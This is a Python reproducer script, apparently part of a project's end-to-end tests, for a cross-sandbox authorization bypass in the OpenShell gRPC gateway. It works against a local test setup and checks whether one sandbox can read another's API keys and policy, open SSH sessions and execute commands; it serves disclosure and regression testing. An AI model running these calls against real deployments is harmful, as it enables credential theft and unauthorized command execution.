#!/usr/bin/env python3
# SPDX-FileCopyrightText: Copyright (c) 2025-2026 NVIDIA CORPORATION & AFFILIATES. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
"""
Reproducer: Cross-Sandbox Authorization Bypass via IDOR
=======================================================
Product : NVIDIA OpenShell (openshell-server gRPC gateway)
Version : 0.0.8-dev.5 (commit 925160e84, main branch)
CWE : CWE-639 - Insecure Direct Object Reference
CVSS : 7.7 (High) - AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
Vulnerability
-------------
Sandbox-scoped gRPC RPCs accept an arbitrary sandbox_id with no
ownership or authorization check. All sandbox pods and the CLI share
a single mTLS client certificate (CN=openshell-client), so the server
cannot distinguish callers at the TLS layer. This allows any sandbox
(or any holder of the shared cert) to:
- Read another sandbox's provider credentials (API keys) via
GetSandboxProviderEnvironment
- Read another sandbox's policy via GetSandboxPolicy
- Create SSH sessions into another sandbox via CreateSshSession
- Execute arbitrary commands inside another sandbox via ExecSandbox
The impact is amplified by the optional unauthenticated edge mode
where no mTLS is required at all.
What this script tests
----------------------
The script creates two sandboxes: a VICTIM (with a secret API key)
and an ATTACKER (separate, no provider). It then calls sandbox-scoped
RPCs using the victim's sandbox_id from the attacker's perspective
(the same mTLS connection, no per-sandbox authorization token).
Tested RPCs:
1. GetSandboxProviderEnvironment - no token (attacker reads victim creds)
2. GetSandboxProviderEnvironment - fabricated token against victim
3. GetSandboxPolicy - no token (attacker reads victim policy)
4. CreateSshSession - no token (attacker gets SSH into victim)
5. ExecSandbox - no token (attacker runs commands in victim)
Tests 1-3 target RPCs that were hardened by the fix (should reject on
patched servers). Tests 4-5 target write-side RPCs (CreateSshSession,
ExecSandbox) which remain unprotected at the time of writing.
Tests 4-5 require the sandbox pod to be in Ready phase. Use --wait-ready
to poll until the sandbox controller has provisioned the pod (default
timeout: 120s). Without --wait-ready, write-side tests will be
INCONCLUSIVE if pods are not yet running.
Limitations
-----------
Legacy sandbox caveat: The patched server's validate_sandbox_token()
allows unrestricted access to sandboxes whose sandbox_token_hash is
empty (created before token enforcement). This script only creates
fresh sandboxes, which always receive a token hash, so it cannot
exercise that legacy compatibility path. A "FIXED" result here does
not prove legacy sandboxes are protected.
Test 2 uses a fabricated UUID-format token, not the attacker sandbox's
real OPENSHELL_SANDBOX_TOKEN. The real token is only available inside
the attacker's pod (injected as an environment variable during pod
creation) and is not returned by the CreateSandbox API. A full cross-
sandbox token replay test would require exec'ing into the attacker pod
to retrieve it. On unpatched servers this distinction is irrelevant
since no token validation exists. On patched servers, the fabricated
token still proves the server rejects non-matching tokens, but would
not catch a hypothetical regression that accepts any valid-for-some-
sandbox token.
Tests 4-5 (CreateSshSession, ExecSandbox) will be INCONCLUSIVE when
the sandbox pod is not actually running, because the server rejects
with FAILED_PRECONDITION before reaching any authorization logic.
Use --wait-ready to wait for pod provisioning. The absence of
validate_sandbox_token() in both handlers is confirmed by source
inspection (see grpc.rs create_ssh_session and exec_sandbox).
Error classification: Tests 1-3 only count UNAUTHENTICATED or
PERMISSION_DENIED as proof that the authorization fix is active.
Any other gRPC error (NOT_FOUND, INTERNAL, UNAVAILABLE, etc.) is
recorded as INCONCLUSIVE to avoid false confidence from transport
or unrelated server failures.
Prerequisites
-------------
1. A running OpenShell gateway (openshell gateway start)
2. Python 3.10+ with grpcio and protobuf
3. Generated proto stubs in python/openshell/_proto/
4. mTLS certs at ~/.config/openshell/gateways/<gateway>/mtls/
Usage
-----
Read-side tests only (fast, no pod wait):
PYTHONPATH=python uv run python e2e/python/reproducer_sandbox_authz_bypass.py
Full test including write-side (waits for pod provisioning):
PYTHONPATH=python uv run python e2e/python/reproducer_sandbox_authz_bypass.py \\
--wait-ready
With custom endpoint, gateway name, or timeout:
PYTHONPATH=python uv run python e2e/python/reproducer_sandbox_authz_bypass.py \\
--wait-ready --ready-timeout 180 --endpoint 127.0.0.1:8080 --gateway openshell
PYTHONPATH=python uv run python e2e/python/reproducer_sandbox_authz_bypass.py \\
--plaintext --endpoint 127.0.0.1:9090
Expected results
----------------
VULNERABLE (unpatched): All tests return data - API keys leaked,
SSH session created, commands executed,
policy disclosed.
FIXED (patched): Tests 1-3 are rejected with UNAUTHENTICATED
or PERMISSION_DENIED. Tests 4-5 may still
succeed (CreateSshSession and ExecSandbox
are not yet gated).
Note: "FIXED" only covers fresh sandboxes.
Legacy sandboxes with empty token hashes
are still allowed through by the patch.
"""
from __future__ import annotations
import argparse
import pathlib
import sys
import time
import grpc
from openshell._proto import (
datamodel_pb2,
openshell_pb2,
openshell_pb2_grpc,
sandbox_pb2,
)
def parse_args() -> argparse.Namespace:
p = argparse.ArgumentParser(
description="Reproduce cross-sandbox authorization bypass in OpenShell gateway",
)
p.add_argument(
"--endpoint",
default="127.0.0.1:8080",
help="Gateway gRPC endpoint (default: 127.0.0.1:8080)",
)
p.add_argument(
"--gateway",
default="openshell",
help="Gateway name for mTLS cert lookup (default: openshell)",
)
p.add_argument(
"--plaintext",
action="store_true",
help="Use insecure plaintext channel (skip mTLS)",
)
p.add_argument(
"--wait-ready",
action="store_true",
help="Wait for victim sandbox pod to reach Ready before running "
"write-side tests (CreateSshSession, ExecSandbox). Without this "
"flag, write-side tests may be INCONCLUSIVE.",
)
p.add_argument(
"--ready-timeout",
type=int,
default=120,
help="Seconds to wait for sandbox Ready when --wait-ready is set "
"(default: 120)",
)
return p.parse_args()
def make_channel(args: argparse.Namespace) -> grpc.Channel:
if args.plaintext:
return grpc.insecure_channel(args.endpoint)
mtls_dir = (
pathlib.Path.home()
/ ".config"
/ "openshell"
/ "gateways"
/ args.gateway
/ "mtls"
)
ca_pem = (mtls_dir / "ca.crt").read_bytes()
cert_pem = (mtls_dir / "tls.crt").read_bytes()
key_pem = (mtls_dir / "tls.key").read_bytes()
credentials = grpc.ssl_channel_credentials(
root_certificates=ca_pem,
private_key=key_pem,
certificate_chain=cert_pem,
)
return grpc.secure_channel(args.endpoint, credentials)
def delete_quietly(stub, name: str, kind: str) -> None:
try:
if kind == "sandbox":
stub.DeleteSandbox(openshell_pb2.DeleteSandboxRequest(name=name))
elif kind == "provider":
stub.DeleteProvider(openshell_pb2.DeleteProviderRequest(name=name))
except grpc.RpcError:
pass
def _default_policy() -> sandbox_pb2.SandboxPolicy:
return sandbox_pb2.SandboxPolicy(
version=1,
filesystem=sandbox_pb2.FilesystemPolicy(
include_workdir=True,
read_only=["/usr", "/lib", "/etc"],
read_write=["/sandbox", "/tmp"],
),
process=sandbox_pb2.ProcessPolicy(
run_as_user="sandbox",
run_as_group="sandbox",
),
)
def wait_for_sandbox_ready(
stub, sandbox_id: str, timeout: int = 120, poll_interval: int = 3,
) -> bool:
"""Poll CreateSshSession until sandbox is Ready or timeout expires.
Returns True if sandbox reached Ready, False on timeout. We use
CreateSshSession as the probe because it returns FAILED_PRECONDITION
when the sandbox phase is not Ready, and succeeds (or returns an
authz error) when it is.
"""
deadline = time.monotonic() + timeout
attempt = 0
while time.monotonic() < deadline:
attempt += 1
try:
resp = stub.CreateSshSession(
openshell_pb2.CreateSshSessionRequest(sandbox_id=sandbox_id)
)
stub.RevokeSshSession(
openshell_pb2.RevokeSshSessionRequest(token=resp.token)
)
return True
except grpc.RpcError as e:
if e.code() == grpc.StatusCode.FAILED_PRECONDITION:
remaining = int(deadline - time.monotonic())
print(f" [{attempt}] Sandbox not ready, {remaining}s remaining...")
time.sleep(poll_interval)
elif e.code() in (
grpc.StatusCode.UNAUTHENTICATED,
grpc.StatusCode.PERMISSION_DENIED,
):
return True
else:
print(f" [{attempt}] Unexpected: {e.code().name}: {e.details()}")
time.sleep(poll_interval)
return False
AUTHZ_CODES = frozenset({
grpc.StatusCode.UNAUTHENTICATED,
grpc.StatusCode.PERMISSION_DENIED,
})
class Result:
def __init__(self):
self.vulnerable = 0
self.fixed = 0
self.inconclusive = 0
self.entries: list[tuple[str, str, str]] = []
def record(self, test: str, status: str, detail: str) -> None:
self.entries.append((test, status, detail))
if status == "VULNERABLE":
self.vulnerable += 1
elif status == "FIXED":
self.fixed += 1
else:
self.inconclusive += 1
def record_rpc_error(self, test: str, e: grpc.RpcError) -> None:
"""Classify an RPC error as FIXED or INCONCLUSIVE.
Only UNAUTHENTICATED and PERMISSION_DENIED indicate the
authorization check actually fired. Any other error (NOT_FOUND,
INTERNAL, UNAVAILABLE, etc.) is ambiguous and recorded as
INCONCLUSIVE to avoid false confidence.
"""
detail = f"{e.code().name}: {e.details()}"
if e.code() in AUTHZ_CODES:
print(f"\n [OK] REJECTED by authorization - {detail}")
self.record(test, "FIXED", detail)
else:
print(f"\n [??] INCONCLUSIVE - non-authz error")
print(f" {detail}")
self.record(test, "INCONCLUSIVE", detail)
def main() -> int:
args = parse_args()
channel = make_channel(args)
stub = openshell_pb2_grpc.OpenShellStub(channel)
try:
stub.Health(openshell_pb2.HealthRequest(), timeout=10)
except grpc.RpcError as e:
print(f"[!] Cannot reach gateway at {args.endpoint}: {e}", file=sys.stderr)
return 1
print(f"[+] Connected to gateway at {args.endpoint}")
SECRET_KEY = "sk-ant-SUPER-SECRET-KEY-12345"
VICTIM_PROVIDER = "repro-victim-provider"
VICTIM_SANDBOX = "repro-victim-sandbox"
ATTACKER_SANDBOX = "repro-attacker-sandbox"
result = Result()
try:
# =================================================================
# SETUP: Victim provider + sandbox (has secrets)
# =================================================================
delete_quietly(stub, VICTIM_PROVIDER, "provider")
stub.CreateProvider(
openshell_pb2.CreateProviderRequest(
provider=datamodel_pb2.Provider(
name=VICTIM_PROVIDER,
type="claude",
credentials={"ANTHROPIC_API_KEY": SECRET_KEY},
)
)
)
print(f"[+] Created victim provider '{VICTIM_PROVIDER}'")
print(f" Secret: {SECRET_KEY}")
delete_quietly(stub, VICTIM_SANDBOX, "sandbox")
victim_resp = stub.CreateSandbox(
openshell_pb2.CreateSandboxRequest(
name=VICTIM_SANDBOX,
spec=datamodel_pb2.SandboxSpec(
policy=_default_policy(),
providers=[VICTIM_PROVIDER],
),
)
)
victim_id = victim_resp.sandbox.id
print(f"[+] Created victim sandbox '{VICTIM_SANDBOX}' (id: {victim_id})")
# =================================================================
# SETUP: Attacker sandbox (no provider, separate identity)
# =================================================================
delete_quietly(stub, ATTACKER_SANDBOX, "sandbox")
attacker_resp = stub.CreateSandbox(
openshell_pb2.CreateSandboxRequest(
name=ATTACKER_SANDBOX,
spec=datamodel_pb2.SandboxSpec(policy=_default_policy()),
)
)
attacker_id = attacker_resp.sandbox.id
print(f"[+] Created attacker sandbox '{ATTACKER_SANDBOX}' (id: {attacker_id})")
print()
# =================================================================
# TEST 1: GetSandboxProviderEnvironment - no token
#
# Attacker uses the shared mTLS cert to read the victim's
# provider credentials without any per-sandbox token.
# =================================================================
print("=" * 64)
print("TEST 1: GetSandboxProviderEnvironment - no token")
print(f" caller context = attacker (shared mTLS cert)")
print(f" target = victim sandbox {victim_id}")
print(f" x-sandbox-token = (none)")
print("=" * 64)
try:
env_resp = stub.GetSandboxProviderEnvironment(
openshell_pb2.GetSandboxProviderEnvironmentRequest(
sandbox_id=victim_id,
)
)
env = dict(env_resp.environment)
leaked = env.get("ANTHROPIC_API_KEY", "")
detail = f"leaked ANTHROPIC_API_KEY={leaked}"
print(f"\n [!!] VULNERABLE - {detail}")
result.record("GetSandboxProviderEnvironment (no token)", "VULNERABLE", detail)
except grpc.RpcError as e:
result.record_rpc_error("GetSandboxProviderEnvironment (no token)", e)
# =================================================================
# TEST 2: GetSandboxProviderEnvironment - fabricated token
#
# Submits a UUID-format token that is not valid for any
# sandbox. On unpatched servers, the header is ignored and
# credentials are returned. On patched servers, the token
# hash won't match and the call is rejected.
#
# NOTE: This is NOT a real cross-sandbox token replay.
# The attacker's real OPENSHELL_SANDBOX_TOKEN is only
# available inside the attacker pod and cannot be obtained
# through the API. See the Limitations section in the
# docstring for details.
# =================================================================
print()
print("=" * 64)
print("TEST 2: GetSandboxProviderEnvironment - fabricated token")
print(f" caller context = attacker (shared mTLS cert)")
print(f" target = victim sandbox {victim_id}")
print(f" x-sandbox-token = (fabricated UUID, not valid for any sandbox)")
print("=" * 64)
fabricated_token = f"aaaaaaaa-bbbb-cccc-dddd-{attacker_id[:12]}"
try:
env_resp = stub.GetSandboxProviderEnvironment(
openshell_pb2.GetSandboxProviderEnvironmentRequest(
sandbox_id=victim_id,
),
metadata=[("x-sandbox-token", fabricated_token)],
)
env = dict(env_resp.environment)
leaked = env.get("ANTHROPIC_API_KEY", "")
detail = f"leaked ANTHROPIC_API_KEY={leaked}"
print(f"\n [!!] VULNERABLE - {detail}")
result.record("GetSandboxProviderEnvironment (fabricated token)", "VULNERABLE", detail)
except grpc.RpcError as e:
result.record_rpc_error("GetSandboxProviderEnvironment (fabricated token)", e)
# =================================================================
# TEST 3: GetSandboxPolicy - no token
#
# Attacker reads the victim's sandbox policy configuration.
# GetSandboxPolicyRequest lives in sandbox_pb2 (not openshell_pb2).
# =================================================================
print()
print("=" * 64)
print("TEST 3: GetSandboxPolicy - no token")
print(f" caller context = attacker (shared mTLS cert)")
print(f" target = victim sandbox {victim_id}")
print(f" x-sandbox-token = (none)")
print("=" * 64)
try:
policy_resp = stub.GetSandboxPolicy(
sandbox_pb2.GetSandboxPolicyRequest(
sandbox_id=victim_id,
)
)
detail = f"policy version {policy_resp.version} disclosed"
print(f"\n [!!] VULNERABLE - {detail}")
result.record("GetSandboxPolicy (no token)", "VULNERABLE", detail)
except grpc.RpcError as e:
result.record_rpc_error("GetSandboxPolicy (no token)", e)
# =================================================================
# WRITE-SIDE TESTS: require sandbox pod to be Ready
#
# CreateSshSession and ExecSandbox check sandbox phase before
# doing anything, so they return FAILED_PRECONDITION when the
# pod is not running. With --wait-ready, we poll until the
# sandbox controller has provisioned the pod.
# =================================================================
victim_ready = False
if args.wait_ready:
print()
print("=" * 64)
print(f"WAITING for victim sandbox to reach Ready "
f"(timeout {args.ready_timeout}s)")
print("=" * 64)
victim_ready = wait_for_sandbox_ready(
stub, victim_id, timeout=args.ready_timeout,
)
if victim_ready:
print(" Victim sandbox is Ready.")
else:
print(" Timed out. Write-side tests will be INCONCLUSIVE.")
else:
print()
print("[*] Skipping sandbox Ready wait (use --wait-ready to enable)")
# =================================================================
# TEST 4: CreateSshSession - no token
#
# Attacker creates an SSH session into the victim's sandbox.
# At the time of writing, CreateSshSession does NOT call
# validate_sandbox_token(), so this RPC remains unprotected
# even after the read-side fix.
#
# Source: crates/openshell-server/src/grpc.rs, fn create_ssh_session
# =================================================================
print()
print("=" * 64)
print("TEST 4: CreateSshSession - no token")
print(f" caller context = attacker (shared mTLS cert)")
print(f" target = victim sandbox {victim_id}")
print(f" x-sandbox-token = (none)")
print("=" * 64)
try:
ssh_resp = stub.CreateSshSession(
openshell_pb2.CreateSshSessionRequest(
sandbox_id=victim_id,
)
)
detail = (
f"SSH session token issued: {ssh_resp.token[:16]}... "
f"(host={ssh_resp.gateway_host}:{ssh_resp.gateway_port})"
)
print(f"\n [!!] VULNERABLE - {detail}")
result.record("CreateSshSession (no token)", "VULNERABLE", detail)
stub.RevokeSshSession(
openshell_pb2.RevokeSshSessionRequest(token=ssh_resp.token)
)
except grpc.RpcError as e:
detail = f"{e.code().name}: {e.details()}"
if e.code() in AUTHZ_CODES:
print(f"\n [OK] REJECTED by authorization - {detail}")
result.record("CreateSshSession (no token)", "FIXED", detail)
elif e.code() == grpc.StatusCode.FAILED_PRECONDITION:
print(f"\n [??] INCONCLUSIVE - sandbox pod not running")
print(f" {detail}")
if not args.wait_ready:
print(f" Re-run with --wait-ready to wait for pod provisioning.")
result.record("CreateSshSession (no token)", "INCONCLUSIVE", detail)
else:
print(f"\n [??] INCONCLUSIVE - non-authz error")
print(f" {detail}")
result.record("CreateSshSession (no token)", "INCONCLUSIVE", detail)
# =================================================================
# TEST 5: ExecSandbox - no token
#
# Attacker runs a command inside the victim's sandbox.
# ExecSandbox does NOT call validate_sandbox_token(), so this
# RPC remains unprotected even after the read-side fix.
#
# Source: crates/openshell-server/src/grpc.rs, fn exec_sandbox
# =================================================================
print()
print("=" * 64)
print("TEST 5: ExecSandbox - no token")
print(f" caller context = attacker (shared mTLS cert)")
print(f" target = victim sandbox {victim_id}")
print(f" x-sandbox-token = (none)")
exec_cmd = ["hostname"]
print(f" command = {exec_cmd}")
print(f" expected output = '{VICTIM_SANDBOX}' (victim pod name)")
print("=" * 64)
try:
events = stub.ExecSandbox(
openshell_pb2.ExecSandboxRequest(
sandbox_id=victim_id,
command=exec_cmd,
)
)
output_parts = []
exit_code = None
for event in events:
which = event.WhichOneof("payload")
if which == "stdout":
output_parts.append(
event.stdout.data.decode("utf-8", errors="replace")
)
elif which == "stderr":
output_parts.append(
event.stderr.data.decode("utf-8", errors="replace")
)
elif which == "exit":
exit_code = event.exit.exit_code
output = "".join(output_parts).strip()
is_victim = output == VICTIM_SANDBOX
marker = "CONFIRMS victim sandbox" if is_victim else "unexpected hostname"
detail = f"hostname='{output}' ({marker}, exit {exit_code})"
print(f"\n [!!] VULNERABLE - {detail}")
result.record("ExecSandbox (no token)", "VULNERABLE", detail)
except grpc.RpcError as e:
detail = f"{e.code().name}: {e.details()}"
if e.code() in AUTHZ_CODES:
print(f"\n [OK] REJECTED by authorization - {detail}")
result.record("ExecSandbox (no token)", "FIXED", detail)
elif e.code() == grpc.StatusCode.FAILED_PRECONDITION:
print(f"\n [??] INCONCLUSIVE - sandbox pod not running")
print(f" {detail}")
if not args.wait_ready:
print(f" Re-run with --wait-ready to wait for pod provisioning.")
result.record("ExecSandbox (no token)", "INCONCLUSIVE", detail)
else:
print(f"\n [??] INCONCLUSIVE - non-authz error")
print(f" {detail}")
result.record("ExecSandbox (no token)", "INCONCLUSIVE", detail)
# =================================================================
# SUMMARY
# =================================================================
print()
print("=" * 64)
print("RESULTS")
print("=" * 64)
total = len(result.entries)
print(f" Tests run: {total}")
print(f" Vulnerable: {result.vulnerable}")
print(f" Fixed: {result.fixed}")
print(f" Inconclusive: {result.inconclusive}")
print()
for test, status, detail in result.entries:
tags = {
"VULNERABLE": "[!!]",
"FIXED": "[OK]",
"INCONCLUSIVE": "[??]",
}
tag = tags.get(status, "[--]")
print(f" {tag} {test}")
print(f" {detail}")
print()
if result.vulnerable > 0:
print(" CONCLUSION: Authorization bypass CONFIRMED. (exit 2)")
print(" Cross-sandbox credential exfiltration is possible.")
elif result.inconclusive > 0:
print(" CONCLUSION: Read-side RPCs appear fixed, but some tests")
print(" returned non-authz errors or could not be validated.")
print(" Review INCONCLUSIVE entries above. (exit 1)")
else:
print(" CONCLUSION: All tested RPCs rejected unauthorized access")
print(" with explicit authz errors. (exit 0)")
finally:
delete_quietly(stub, ATTACKER_SANDBOX, "sandbox")
delete_quietly(stub, VICTIM_SANDBOX, "sandbox")
delete_quietly(stub, VICTIM_PROVIDER, "provider")
print("\n[+] Cleanup complete")
channel.close()
if result.vulnerable > 0:
return 2
if result.inconclusive > 0:
return 1
return 0
if __name__ == "__main__":
raise SystemExit(main())
Comments
0 B
|0 👍
/0 👎
0 B
|0 👍
/0 👎
0 B
|👍
/👎
0 B
|👍
/👎
0 B
|0 👍
/0 👎
0 B
|0 👍
/0 👎
0 B
|0 👍
/0 👎
0 B
|0 👍
/0 👎
0 B
|0 👍
/0 👎
0 B
|0 👍
/0 👎